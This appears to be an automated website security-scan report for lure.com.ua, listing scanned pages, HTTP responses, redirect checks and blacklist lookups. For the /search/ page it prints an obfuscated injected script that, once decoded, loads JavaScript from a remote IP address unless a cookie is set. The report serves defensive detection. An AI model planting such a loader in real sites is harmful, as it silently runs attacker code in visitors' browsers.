Scanned pages/files
| Request | Server response | Status |
http://lure.com.ua/ | 200 OK Content-Length: 33741 Content-Type: text/html | clean |
http://lure.com.ua/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://site.yandex.net/load/form/1/form.js | 200 OK Content-Length: 1293 Content-Type: application/x-javascript | clean |
http://gredinatib.org/viewt.js | 200 OK Content-Length: 20987 Content-Type: application/x-javascript | clean |
http://userapi.com/js/api/openapi.js?52 | 200 OK Content-Length: 64063 Content-Type: application/x-javascript | clean |
http://lure.com.ua/[https://plus.google.com/114883937075807208319/]?rel=author | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Thu, 22 Jan 2015 13:38:10 GMT Pragma: no-cache Location: http://lure.com.ua/https:/plus.google.com/114883937075807208319/?rel=author Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 22 Jan 2015 13:38:10 GMT Set-Cookie: comment_author_dc64684d3391c375f5ccf821377c48b3=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT Set-Cookie: comment_author_email_dc64684d3391c375f5ccf821377c48b3=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT Set-Cookie: comment_author_url_dc64684d3391c375f5ccf821377c48b3=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT X-Pingback: http://lure.com.ua/xmlrpc.php X-Powered-By: PHP/5.3.28-1~dotdeb.0 | clean |
http://lure.com.ua/https:/plus.google.com/114883937075807208319/?rel=author | 404 Not Found Content-Length: 12775 Content-Type: text/html | clean |
http://feeds.feedburner.com/lurecomua?format=sigpro | 200 OK Content-Length: 4190 Content-Type: application/x-javascript | clean |
http://lure.com.ua/search/ | 200 OK Content-Length: 23847 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://site.yandex.net/load/site.js | 200 OK Content-Length: 575 Content-Type: application/x-javascript | clean |
http://lure.com.ua/search/[https://plus.google.com/114883937075807208319/]?rel=author | 200 OK Content-Length: 20534 Content-Type: text/html | clean |
http://lure.com.ua/search/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/]?rel=author | 200 OK Content-Length: 20581 Content-Type: text/html | clean |
http://lure.com.ua/search/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/]?rel=author | 200 OK Content-Length: 20628 Content-Type: text/html | clean |
http://lure.com.ua/search/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/]?rel=author | 200 OK Content-Length: 20675 Content-Type: text/html | clean |
http://lure.com.ua/search/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/]?rel=author | 200 OK Content-Length: 20722 Content-Type: text/html | clean |
http://lure.com.ua/search/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/[https://plus.google.com/114883937075807208319/]?rel=author | 200 OK Content-Length: 20769 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lure.com.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 13:38:08 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: comment_author_dc64684d3391c375f5ccf821377c48b3=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Set-Cookie: comment_author_email_dc64684d3391c375f5ccf821377c48b3=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Set-Cookie: comment_author_url_dc64684d3391c375f5ccf821377c48b3=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
X-Pingback: http://lure.com.ua/xmlrpc.php
X-Powered-By: PHP/5.3.28-1~dotdeb.0
GET / HTTP/1.1
Host: lure.com.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 13:38:08 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: comment_author_dc64684d3391c375f5ccf821377c48b3=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Set-Cookie: comment_author_email_dc64684d3391c375f5ccf821377c48b3=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Set-Cookie: comment_author_url_dc64684d3391c375f5ccf821377c48b3=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
X-Pingback: http://lure.com.ua/xmlrpc.php
X-Powered-By: PHP/5.3.28-1~dotdeb.0
Second query (visit from search engine):
GET / HTTP/1.1
Host: lure.com.ua
Referer: http://www.google.com/search?q=lure.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lure.com.ua
Referer: http://www.google.com/search?q=lure.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lure.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://lure.com.ua/
Result: lure.com.ua is not infected or malware details are not published yet.
Result: lure.com.ua is not infected or malware details are not published yet.